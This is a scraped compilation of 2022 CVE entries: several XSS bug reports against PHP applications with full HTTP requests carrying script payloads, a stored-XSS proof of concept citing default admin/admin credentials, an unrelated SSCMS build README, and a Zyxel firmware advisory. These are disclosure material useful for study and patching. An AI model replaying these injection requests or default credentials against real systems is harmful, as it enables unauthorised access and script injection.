ChatBot App with Suggestion in PHP/OOP v1.0 is vulnerable to Cross Site Scripting (XSS) via /simple_chat_bot/classes/Master.php?f=save_response.

Permalink

**chatbot-app-suggestion-phpoop v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /simple\_chat\_bot/classes/Master.php?f=save\_response

Vulnerability location: /simple\_chat\_bot/classes/Master.php?f=save\_response, keyword\[\]

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /simple_chat_bot/classes/Master.php?f=save_response HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------268132382818445192602306506330
    Content-Length: 1479
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/simple_chat_bot/admin/?page=responses/manage_response&id=7
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="id"
    
    7
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="response"
    
    <p>On this simple ChatBot Application, You can query anything and the system will automatically browse a response that is stored on this site.ï¿½</p><p>The queries fetch a response that has an equivalent keyword.</p><p>Also, the application consists of suggestion keywords to query.</p>
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="keyword[]"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    Hi
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    Hello
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    Hello There
    -----------------------------268132382818445192602306506330
    Content-Disposition: form-data; name="suggestion[]"
    
    
    -----------------------------268132382818445192602306506330--

CVE-2022-30464: chatbot/xss.md at main · mikeccltt/chatbot

Toll-tax-management-system v1.0 is vulnerable to Cross Site Scripting (XSS) via /ttms/classes/Master.php?f=save_recipient, vehicle_name.

Permalink

Cannot retrieve contributors at this time

**toll-tax-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ttms/classes/Master.php?f=save\_recipient

Vulnerability location: /ttms/classes/Master.php?f=save\_recipient, vehicle\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /ttms/classes/Master.php?f=save_recipient HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------24404946016694802869537324
    Content-Length: 870
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ttms/admin/?page=recipients/manage_recipient
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="category_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="toll_id"
    
    2
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="vehicle_registration"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="owner"
    
    asd
    -----------------------------24404946016694802869537324
    Content-Disposition: form-data; name="cost"
    
    100
    -----------------------------24404946016694802869537324--

CVE-2022-30837: bug_report_CVE/xss.md at main · mikeccltt/bug_report_CVE

Simple Social Networking Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /sns/classes/Users.php?f=save, firstname.

Permalink

Cannot retrieve contributors at this time

**simple-social-networking-site-instagram v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15311/simple-social-networking-site-instagram-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /sns/classes/Users.php?f=save

Vulnerability location: /sns/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /sns/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------2778781845921125101691173168
    Content-Length: 1036
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/sns/admin/?page=user/manage_user
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="middlename"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="lastname"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="username"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="password"
    
    123
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="type"
    
    2
    -----------------------------2778781845921125101691173168
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------2778781845921125101691173168--

CVE-2022-30460: sns_bug_report/xss.md at main · mikeccltt/sns_bug_report

Water-billing-management-system v1.0 is affected by: Cross Site Scripting (XSS) via /wbms/classes/Users.php?f=save, firstname.

Permalink

Cannot retrieve contributors at this time

**water-billing-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15309/water-billing-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /wbms/classes/Users.php?f=save

Vulnerability location: /wbms/classes/Users.php?f=save, firstname

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /wbms/classes/Users.php?f=save HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------41385014663807018218740876870
    Content-Length: 1045
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/wbms/admin/?page=user/manage_user
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="firstname"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="middlename"
    
    123
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="lastname"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="username"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="password"
    
    234
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="type"
    
    1
    -----------------------------41385014663807018218740876870
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------41385014663807018218740876870--

CVE-2022-30462: wbms_bug_report/xss.md at main · mikeccltt/wbms_bug_report

Automotive Shop Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /asms/classes/Master.php?f=save_product, name.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /asms/classes/Master.php?f=save\_product

Vulnerability location: /asms/classes/Master.php?f=save\_product, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /asms/classes/Master.php?f=save_product HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------83960212638164850273547100712
    Content-Length: 835
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/asms/admin/?page=products
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="id"
    
    5
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="name"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="description"
    
    <ScRiPt>alert(1)</ScRiPt>
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="price"
    
    1100.00
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------83960212638164850273547100712
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------83960212638164850273547100712--

CVE-2022-30458: automotive/xss.md at main · mikeccltt/automotive

SiteServer CMS V6.15.51 is affected by a Cross Site Scripting (XSS) vulnerability.

**SSCMS**

SSCMS 基于 .NET Core，能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

**版本**

项目发布的正式版本存放在 master 分支，最新版本存放在 staging 分支

编译状态

版本号

发布日期

**开发文档**

《SSCMS 使用指南》

《SSCMS 系统更新》

《SSCMS STL 语言》

《SSCMS 插件开发》

《SSCMS 官方插件》

《SSCMS 命令行》

《SSCMS REST API》

《SSCMS 数据结构》

**SSCMS 源码结构**

    │ sscms.sln                  Visual Studio 项目文件
    │
    ├─docker                      Docker 配置文件
    ├─src/Datory                  数据库基础类
    ├─src/SSCMS                   接口、基础类
    ├─src/SSCMS.Cli               命令行工具
    ├─src/SSCMS.Core              CMS核心代码
    ├─src/SSCMS.Web               CMS App
    └─tests                       测试
    

**发布跨平台版本****Window(64 位)：**

    npm install
    npm run build-win-x64
    dotnet build ./build-win-x64/build.sln -c Release
    dotnet publish ./build-win-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r win-x64 -c Release -o ./publish/sscms-win-x64
    dotnet publish ./build-win-x64/src/SSCMS.Web/SSCMS.Web.csproj -r win-x64 -c Release -o ./publish/sscms-win-x64
    npm run copy-win-x64
    

> Note: 进入文件夹 ./publish/sscms-win-x64 获取最终发布版本

**Window(32 位)：**

    npm install
    npm run build-win-x32
    dotnet build ./build-win-x32/build.sln -c Release
    dotnet publish ./build-win-x32/src/SSCMS.Cli/SSCMS.Cli.csproj -r win-x32 -c Release -o ./publish/sscms-win-x32
    dotnet publish ./build-win-x32/src/SSCMS.Web/SSCMS.Web.csproj -r win-x32 -c Release -o ./publish/sscms-win-x32
    npm run copy-win-x32
    

> Note: 进入文件夹 ./publish/sscms-win-x32 获取最终发布版本

**Linux：**

    npm install
    npm run build-linux-x64
    dotnet build ./build-linux-x64/build.sln -c Release
    dotnet publish ./build-linux-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r linux-x64 -c Release -o ./publish/sscms-linux-x64
    dotnet publish ./build-linux-x64/src/SSCMS.Web/SSCMS.Web.csproj -r linux-x64 -c Release -o ./publish/sscms-linux-x64
    npm run copy-linux-x64
    

> Note: 进入文件夹 ./publish/sscms-linux-x64 获取最终发布版本

**MacOS：**

    npm install
    npm run build-osx-x64
    dotnet build ./build-osx-x64/build.sln -c Release
    dotnet publish ./build-osx-x64/src/SSCMS.Cli/SSCMS.Cli.csproj -r osx-x64 -c Release -o ./publish/sscms-osx-x64
    dotnet publish ./build-osx-x64/src/SSCMS.Web/SSCMS.Web.csproj -r osx-x64 -c Release -o ./publish/sscms-osx-x64
    npm run copy-osx-x64
    

> Note: 进入文件夹 ./publish/sscms-osx-x64 获取最终发布版本

**在 Docker 中运行**

拉取最新版本的 SS CMS 镜像

docker pull sscms/core:latest

运行 SS CMS 容器

docker run -d \\
    --name my-sscms \\
    -p 80:80 \\
    --restart=always \\
    -v volume-sscms:/app/wwwroot \\
    -e SSCMS\_SECURITY\_KEY=e2a3d303-ac9b-41ff-9154-930710af0845 \\
    -e SSCMS\_DATABASE\_TYPE=SQLite \\
    sscms/core

**贡献代码**

项目编译需要使用 Visual Studio 2019，你可以从这里下载 Visual Studio Community 2019

代码贡献有很多形式，从提交问题，撰写文档，到提交代码，我们欢迎任何形式的贡献！

**系统更新**

SSCMS 产品将每隔两月发布新的正式版本，我们将在每次迭代中对核心功能、文档支持、功能插件以及网站模板四个方面进行持续改进。

**问题与建议**

如果发现任何 BUG 以及对产品使用的问题与建议，请提交至 Github Issues 或者 Gitee Issues。

**关注最新动态**

**License**

GNU Affero General Public License v3.0

Copyright (C) 2003-2022 SSCMS

CVE-2021-42656: GitHub - siteserver/cms: SS CMS 基于 .NET Core，能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

Badminton Center Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via /bcms/classes/Master.php?f=save_court_rental.

Permalink

Cannot retrieve contributors at this time

**badminton-center-management-system v1.0 - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Date: 2022-05-06

Vulnerability File: /bcms/classes/Master.php?f=save\_court\_rental

Vulnerability location: /bcms/classes/Master.php?f=save\_court\_rental, client\_name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST /bcms/classes/Master.php?f=save_court_rental HTTP/1.1
    Host: bcms.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------176722279832480832321731227058
    Content-Length: 1164
    Origin: http://bcms.com
    Connection: keep-alive
    Referer: http://bcms.com/bcms/admin/?page=court_rentals/manage_court_rental&id=5
    Cookie: PHPSESSID=bruvaommkrfrt7tjj2m3mr8ui0
    
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="id"
    
    5
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="client_name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="contact"
    
    15115111511
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="court_id"
    
    3
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="court_price"
    
    450.00
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="datetime_start"
    
    0222-02-22T22:22
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="hours"
    
    22.00
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="datetime_end"
    
    
    -----------------------------176722279832480832321731227058
    Content-Disposition: form-data; name="total"
    
    9900.00
    -----------------------------176722279832480832321731227058--

CVE-2022-30456: badminton-center-management-system/badminton-center-management-system-xss.md at main · mikeccltt/badminton-center-management-system

A vulnerability, which was classified as problematic, has been found in Home Clean Services Management System 1.0. This issue affects register.php?link=registerand. The manipulation with the input <script>alert(1)</script> leads to cross site scripting. The attack may be initiated remotely but demands authentication. Exploit details have been disclosed to the public.

**Home Clean Services Management System Stored Cross-Site Scripting(XSS)****Exploit Title: Home Clean Services Management System Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15293&title=Home+Clean+Service+System+in+PHP+Free+Source+Code****Version: Home Clean Services Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Home Clean Services Management System does not filter the content correctly at the "register" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin Password: admin
    
2.  Open Page http://172.24.5.102/HCS/public\_html/register.php?link=registerand click Edit button
    
3.  Put XSS payload (<script>alert(111)</script>) in the content box and click on Register to publish the page  
    
4.  Viewing the successfully published page,Open Page http://172.24.5.102/HCS/public\_html/admin/userlist.php,We can see the alert.

CVE-2022-1840: webray.com.cn/Home Clean Services Management System Stored Cross-Site Scripting(XSS).md at main · Xor-Gerke/webray.com.cn

A vulnerability, which was classified as problematic, was found in Student Information System 1.0. Affected is admin/?page=students of the Student Roll module. The manipulation with the input <script>alert(1)</script> leads to authenticated cross site scripting. Exploit details have been disclosed to the public.

CVE-2022-1819

A downgrade from two-factor authentication to one-factor authentication vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.32 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, and VPN series firmware versions 4.32 through 5.21, that could allow an authenticated attacker to bypass the second authentication phase to connect the IPsec VPN server even though the two-factor authentication (2FA) was enabled.

CVEs: CVE-2022-0734, CVE-2022-26531, CVE-2022-26532, CVE-2022-0910

Summary

Zyxel is aware of multiple vulnerabilities reported by security consultancies and advises users to install the applicable firmware updates for optimal protection.

What are the vulnerabilities?

CVE-2022-0734

A cross-site scripting vulnerability was identified in the CGI program of some firewall versions that could allow an attacker to obtain some information stored in the user’s browser, such as cookies or session tokens, via a malicious script.

CVE-2022-26531

Multiple improper input validation flaws were identified in some CLI commands of some firewall, AP controller, and AP versions that could allow a local authenticated attacker to cause a buffer overflow or a system crash via a crafted payload.

CVE-2022-26532

A command injection vulnerability in the "packet-trace" CLI command of some firewall, AP controller, and AP versions could allow a local authenticated attacker to execute arbitrary OS commands by including crafted arguments to the command.

CVE-2022-0910

An authentication bypass vulnerability caused by the lack of a proper access control mechanism has been found in the CGI program of some firewall versions. The flaw could allow an attacker to downgrade from two-factor authentication to one-factor authentication via an IPsec VPN client.

What versions are vulnerable—and what should you do?

After a thorough investigation, we’ve identified the vulnerable products that are within their vulnerability support period and released patches to address the CVEs, as shown in the tables below.

Table 1. Firewalls affected by CVE-2022-0734, CVE-2022-26531, CVE-2022-26532, and CVE-2022-0910

Firewall

Affected version

Patch availability

CVE-2022-0734

CVE-2022-26531

CVE-2022-26532

CVE-2022-0910

USG/ZyWALL

ZLD V4.35~V4.70

ZLD V4.09~V4.71

ZLD V4.09~V4.71

ZLD V4.32~V4.71

ZLD V4.72

USG FLEX

ZLD V4.50~V5.20

ZLD V4.50~V5.21

ZLD V4.50~V5.21

ZLD V4.50~V5.21

ZLD V5.30

ATP

ZLD V4.35~V5.20

ZLD V4.32~V5.21

ZLD V4.32~V5.21

ZLD V4.32~V5.21

ZLD V5.30

VPN

ZLD V4.35~V5.20

ZLD V4.30~V5.21

ZLD V4.30~V5.21

ZLD V4.32~V5.21

ZLD V5.30

NSG

Not affected

V1.00~V1.33 Patch 4

V1.00~V1.33 Patch 4

Not affected

V1.33 Patch 5

Table 2. AP controllers affected by CVE-2022-26531 and CVE-2022-26532

AP Controller

Affected version

Patch availability

CVE-2022-26531 and CVE-2022-26532

NXC2500

6.10(AAIG.3) and earlier

Hotfix by request\*

NXC5500

6.10(AAOS.3) and earlier

Hotfix by request\*

Table 3. APs affected by CVE-2022-26531 and CVE-2022-26532

AP

Affected version

Patch availability

CVE-2022-26531 and CVE-2022-26532

NAP203

6.25(ABFA.7) and earlier

6.25(ABFA.8)

NAP303

6.25(ABEX.7) and earlier

6.25(ABEX.8)

NAP353

6.25(ABEY.7) and earlier

6.25(ABEY.8)

NWA50AX

6.25(ABYW.5) and earlier

6.25(ABYW.8)

NWA55AXE

6.25(ABZL.5) and earlier

6.25(ABZL.8)

NWA90AX

6.27(ACCV.2) and earlier

6.27(ACCV.3)

NWA110AX

6.30(ABTG.2) and earlier

6.30(ABTG.3)

NWA210AX

6.30(ABTD.2) and earlier

6.30(ABTD.3)

NWA1123-AC-HD

6.25(ABIN.6) and earlier

6.25(ABIN.8)

NWA1123-AC-PRO

6.25(ABHD.7) and earlier

6.25(ABHD.8)

NWA1123ACv3

6.30(ABVT.2) and earlier

6.30(ABVT.3)

NWA1302-AC

6.25(ABKU.6) and earlier

6.25(ABKU.8)

NWA5123-AC-HD

6.25(ABIM.6) and earlier

6.25(ABIM.8)

WAC500H

6.30(ABWA.2) and earlier

6.30(ABWA.3)

WAC500

6.30(ABVS.2) and earlier

6.30(ABVS.3)

WAC5302D-S

6.10(ABFH.10) and earlier

Hotfix by request\*

WAC5302D-Sv2

6.25(ABVZ.6) and earlier

6.25(ABVZ.8)

WAC6103D-I

6.25(AAXH.7) and earlier

6.25(AAXH.8)

WAC6303D-S

6.25(ABGL.6) and earlier

6.25(ABGL.8)

WAC6502D-E

6.25(AASD.7) and earlier

6.25(AASD.8)

WAC6502D-S

6.25(AASE.7) and earlier

6.25(AASE.8)

WAC6503D-S

6.25(AASF.7) and earlier

6.25(AASF.8)

WAC6553D-E

6.25(AASG.7) and earlier

6.25(AASG.8)

WAC6552D-S

6.25(ABIO.7) and earlier

6.25(ABIO.8)

WAX510D

6.30(ABTF.2) and earlier

6.30(ABTF.3)

WAX610D

6.30(ABTE.2) and earlier

6.30(ABTE.3)

WAX630S

6.30(ABZD.2) and earlier

6.30(ABZD.3)

WAX650S

6.30(ABRM.2) and earlier

6.30(ABRM.3)

\*Please reach out to your local Zyxel support team for the file.

Got a question?

Please contact your local service rep or visit Zyxel’s forum for further information or assistance.

Acknowledgment

Thanks to the following security consultancies for reporting the issues to us:

*   Riccardo Krauter at Soter IT Security for CVE-2022-0734
*   HN Security for CVE-2022-26531 and CVE-2022-26532
*   Ascend PC for CVE-2022-0910

Revision history

2022-05-24: Initial release

Tag

#xss